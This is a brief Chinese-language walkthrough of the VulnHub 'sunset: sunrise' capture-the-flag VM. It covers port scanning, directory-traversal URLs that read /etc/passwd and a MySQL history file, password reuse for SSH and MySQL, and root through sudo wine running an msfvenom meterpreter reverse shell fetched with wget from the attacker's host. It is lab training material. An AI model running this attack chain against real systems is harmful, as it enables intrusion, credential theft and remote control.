貓寧~~~
地址:http://www.vulnhub.com/entry/sunset-sunrise,406/
關注工具和思路。
nmap 192.168.43.0/24
靶機IP
192.168.43.11
nmap -A -p1-65535 192.168.43.11
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)
http://192.168.43.11/
http://192.168.43.11:8080/,獲知Weborf/0.12.2 (GNU/Linux)
Weborf/0.12.2存在目錄遍歷漏洞
https://www.exploit-db.com/exploits/14925
查看用戶列表
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
關注
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
查看家目錄,正好是上述兩個用戶
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf
如下可以訪問
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
顯示ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc
ssh [email protected],輸入iheartrainbows44,進入
uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
mysql -uweborf -p,密碼還是iheartrainbows44
show databases;
use mysql;
show tables;
select Host,User,Password from user;
localhost | sunrise | thefutureissobrightigottawearshades
su sunrise,輸入密碼thefutureissobrightigottawearshades,sunrise@sunrise:/home/weborf$
sudo -l
獲知(root) /usr/bin/wine
提權信息收集程序
https://github.com/sleventyeleven/linuxprivchecker
msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe
python3 -m http.server 80
進入靶機
wget http://192.168.43.154/muma.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
sudo /usr/bin/wine muma.exe
密碼thefutureissobrightigottawearshades
直接獲取shell
meterpreter >
cd /root
cat.root.txt
24edb59d21c273c033aa6f1689b0b18c
或者直接在靶機執行sudo /usr/bin/wine cmd.exe
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c